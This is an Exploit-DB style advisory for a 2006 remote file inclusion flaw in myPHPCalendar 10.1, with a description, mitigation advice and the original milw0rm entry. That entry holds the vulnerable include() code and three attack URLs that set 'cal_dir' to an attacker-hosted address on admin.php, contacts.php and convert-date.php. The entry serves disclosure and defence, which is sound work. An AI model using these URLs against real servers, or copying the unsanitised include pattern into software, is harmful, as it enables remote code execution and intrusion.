myPHPCalendar

vendor:

myPHPCalendar

by:

Cr@zy_King

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: myPHPCalendar

Affected Version From: 10.1

Affected Version To: 10.1

Patch Exists: NO

Related CWE: N/A

CPE: myphpcalendar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

myPHPCalendar is vulnerable to a remote file inclusion vulnerability. This vulnerability is caused due to the 'cal_dir' parameter in 'admin.php', 'contacts.php' and 'convert-date.php' scripts not properly sanitized before being used to include files. This can be exploited to include arbitrary remote files from a third-party server by passing an URL as the 'cal_dir' parameter. Successful exploitation of this vulnerability can result in arbitrary remote code execution on the vulnerable system.

Mitigation:

Input validation should be used to ensure that untrusted input is not used to include or execute files. The application should also use a whitelist of allowed files and directories to prevent the inclusion of unexpected files.

Source

Exploit-DB raw data:

# script name : myPHPCalendar

# Script Downloads : http://freshmeat.net/projects/myphpcalendar/

# Web Site : http://myphpcalendar.sourceforge.net/

# Version : 10.1

# Risk : High

# Found By : Cr@zy_King

# Thanks : | eTNR | ApAci | Eno7 | TheHacker | Kormali46 | The_Bekir |
Metallicali | Liz0zim | ERNE | Swat_Hack | Commander | Soceita

# Code :
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");


#Vuln : http://[target]/admin.php?cal_dir=http://[attacker]/
http://[target]/contacts.php?cal_dir=http://[attacker]/
http://[target]/convert-date.php?cal_dir=http://[attacker]/


#Contact: crazy_king[at]turkusev[dot]com

# ---------------------------Satbirlikleri.Org&SiberAktif.Net-----------------------------

# milw0rm.com [2006-12-26]